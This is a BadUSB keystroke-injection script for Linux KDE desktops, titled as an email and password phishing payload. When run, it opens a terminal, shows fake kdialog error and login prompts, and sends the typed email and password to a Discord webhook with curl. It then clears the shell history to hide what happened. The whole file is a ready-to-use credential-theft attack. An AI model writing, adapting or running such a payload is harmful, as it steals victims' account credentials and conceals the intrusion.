REM ###########################################################
REM #                                                         |
REM # Title        : Exfiltrate Email And Password By Phising |
REM # Author       : Aleff                                    |
REM # Version      : 1.0                                      |
REM # Category     : Phishing                                 |
REM # Target       : Linux                                    |
REM #                                                         |
REM ###########################################################

REM Requirements:
REM     - Internet Connection
REM     - Discord webhook
REM     - KDE/kdialog based

REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE #WEBHOOK example.com


DELAY 1000
CTRL-ALT t
DELAY 2000

REM #### POPUP SECTION ####

STRINGLN WEBHOOK_URL="#WEBHOOK"
DELAY 500

REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit;
ENTER
